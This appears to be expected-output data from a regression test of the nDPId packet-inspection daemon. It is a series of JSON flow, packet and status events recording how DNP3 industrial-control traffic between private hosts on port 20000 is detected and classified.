00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097501938503,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097501938503,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":40,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1097502623045}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097502623045,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097502623045,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1097502623045,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097502623045,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTRVAAIAGmagKAAAICgAAAwrzTiBm5W0JAAAAAHAC\/\/9CEwAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097502623045,"flow_last_seen":1097502623047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097502623047,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":79,"packets-processed":78,"total-skipped-flows":0,"total-l4-data-len":540,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1097504102255}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097504102255,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097504102255,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1097504102255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097504102255,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTjtAAIAGmIIKAAAICgAAAwsMTiCPBdusAAAAAHAC\/\/+rNgAAAgQFtAEBBAI="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097504102255,"flow_last_seen":1097504102257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097504102257,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2828,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1097502623045,"flow_last_seen":1097502648678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1097504103602,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2803,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":217,"packets-processed":216,"total-skipped-flows":0,"total-l4-data-len":3957,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1097505644006}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097505644006,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097505644006,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1097505644006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097505644006,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAVNAAIAG5WkKAAAJCgAAAwQ4TiAZahgcAAAAAHAC\/\/\/rNQAAAgQFtAEBBAI="}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097505644006,"flow_last_seen":1097505719035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1097505719035,"l3_proto":"ip4","src_ip":"10.0.0.9","dst_ip":"10.0.0.3","src_port":1080,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","packets-captured":352,"packets-processed":351,"total-skipped-flows":0,"total-l4-data-len":5682,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1097507785883}
00566{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1097507785883,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1097507785883,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":1086,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1097507785883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1097507785883,"pkt":"AAKzznBRAFAEk3BnCABFAAAwAaRAAIAG5RkKAAAICgAAAwQ+TiAMLRLKAAAAAHAC\/\/\/9vwAAAgQFtAEBBAI="}
